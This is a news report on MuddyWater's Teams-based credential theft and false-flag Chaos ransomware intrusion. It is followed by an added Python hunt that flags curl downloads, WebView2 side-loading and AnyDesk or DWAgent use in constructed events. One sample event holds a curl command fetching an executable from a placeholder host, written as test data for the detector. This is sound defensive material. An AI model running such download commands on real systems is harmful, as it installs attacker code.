MuddyWater used Teams to steal credentials in false-flag attack

Iran-linked MuddyWater used Microsoft Teams screen sharing to harvest credentials, bypass multi-factor authentication and pose as Chaos ransomware while exfiltrating data, Rapid7 reported.

Rapid7 reported that an Iran-linked hacking group known as MuddyWater used Microsoft Teams screen-sharing to collect employee credentials, bypass multi-factor authentication and carry out a false-flag operation that mimicked Chaos ransomware. The activity was observed in early 2026 and focused on data theft and long-term access rather than mass file encryption.

Investigators found that the attackers initiated external chat requests through Teams and asked employees to start interactive screen-sharing sessions. During those sessions, victims typed account credentials into locally created text files and, in some instances, entered MFA codes into files at the attackers’ direction. The intruders then installed remote management tools, including AnyDesk and DWAgent, to maintain access, perform reconnaissance and move laterally within the network.

The intrusion began with an executable labeled ms_upd.exe that was downloaded over RDP with the curl utility from an external server. That dropper retrieved additional files: a remote access trojan identified as game.exe or Darkcomp that impersonates a Microsoft WebView2 application, a legitimate WebView2Loader.dll, and an encrypted configuration file. The RAT contacted a command-and-control server, polled for commands on a regular interval, could run PowerShell or spawn interactive shells, and performed file operations to support ongoing remote control and data collection.

Rapid7 linked the activity to MuddyWater through reuse of a code-signing certificate registered to “Donald Gay,” a certificate previously used to sign other malicious tools attributed to the cluster. The investigators also noted the group’s use of widely available cybercrime tools such as CastleRAT and Tsundere in recent operations, and its past involvement in incidents that used loaders like PowGoop and ransomware families including Thanos and Qilin.

Chaos is a ransomware-as-a-service brand that surfaced in 2025 and offers affiliates options such as DDoS threats and pressure campaigns against customers or competitors. Rapid7 observed Chaos artifacts in the intrusion, but found no evidence of widespread file encryption. Rapid7 wrote, “The apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion.”

Other security firms reported related Iran-aligned activity in the region, including an operation that exposed more than 26,000 records from a government ministry and claims by pro-Iran hacktivist groups of multiple data leaks. Sergey Shykevich, group manager at Check Point Research, warned, “The cyber and kinetic domains are now explicitly connected,” and described a rise in attacks that combine data theft and other objectives.

Rapid7 recommended that security teams scrutinize external collaboration requests in Teams, strengthen MFA controls to resist social manipulation and monitor for persistent remote-management software such as AnyDesk and DWAgent. The report emphasized that attackers used social engineering via collaboration tools to gain initial access and then focused on maintaining covert access and extracting sensitive files rather than launching a large-scale encryption campaign.
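As an added illustration, not part of the Rapid7 report or this article, the following Python hunt runs over constructed, Sysmon-style process-creation events and flags the stages the article describes: a curl download of an executable such as ms_upd.exe, a WebView2Loader.dll side-load by a binary outside a trusted install directory, and execution of AnyDesk or DWAgent. The event field names, file paths and sample events are assumptions made for the example.

```python
"""Hunt for the Teams-to-remote-management chain described in the report.

Events are constructed, Sysmon-style dicts; the field names ("image",
"command_line", "loaded_dlls") are assumptions, not a vendor schema.
"""
import re

# Remote-management tools the report names as persistence mechanisms.
RMM_IMAGES = {"anydesk.exe", "dwagent.exe"}
# File names from the reported chain (names only, no hashes are given).
STAGER_NAMES = {"ms_upd.exe", "game.exe"}
# Legitimate WebView2 hosts live under these directories (assumed list).
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
# curl fetching something that ends in .exe from any http(s) URL.
CURL_EXE = re.compile(r"https?://\S+\.exe")


def classify(event):
    """Return the list of reasons an event is suspicious ([] if none)."""
    image = event.get("image", "").lower()
    basename = image.rsplit("\\", 1)[-1]
    cmdline = event.get("command_line", "").lower()
    loaded = {d.lower() for d in event.get("loaded_dlls", [])}
    reasons = []
    if basename == "curl.exe" and CURL_EXE.search(cmdline):
        reasons.append("curl download of executable")          # initial stager
    if basename in STAGER_NAMES:
        reasons.append(f"known stager name {basename}")        # dropper / RAT
    if "webview2loader.dll" in loaded and not image.startswith(TRUSTED_DIRS):
        reasons.append("WebView2Loader.dll loaded from untrusted path")  # side-load
    if basename in RMM_IMAGES:
        reasons.append(f"remote-management tool {basename}")   # persistence
    return reasons


def hunt(events):
    """Return (event id, reasons) for every event with at least one hit."""
    hits = [(e["id"], classify(e)) for e in events]
    return [(i, r) for i, r in hits if r]


# Constructed sample telemetry; 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"id": 1, "image": "C:\\Windows\\System32\\curl.exe",
     "command_line": "curl http://203.0.113.5/ms_upd.exe -o ms_upd.exe"},
    {"id": 2, "image": "C:\\Users\\victim\\AppData\\Local\\Temp\\game.exe",
     "command_line": "game.exe", "loaded_dlls": ["WebView2Loader.dll"]},
    {"id": 3, "image": "C:\\Program Files\\Microsoft\\Edge\\msedge.exe",
     "command_line": "msedge.exe", "loaded_dlls": ["WebView2Loader.dll"]},
    {"id": 4, "image": "C:\\Users\\victim\\AppData\\Roaming\\AnyDesk\\AnyDesk.exe",
     "command_line": "AnyDesk.exe --service"},
]

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Event 3 (a legitimate Edge process loading the same DLL from Program Files) is deliberately included to show the trusted-path allowlist suppressing a false positive.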
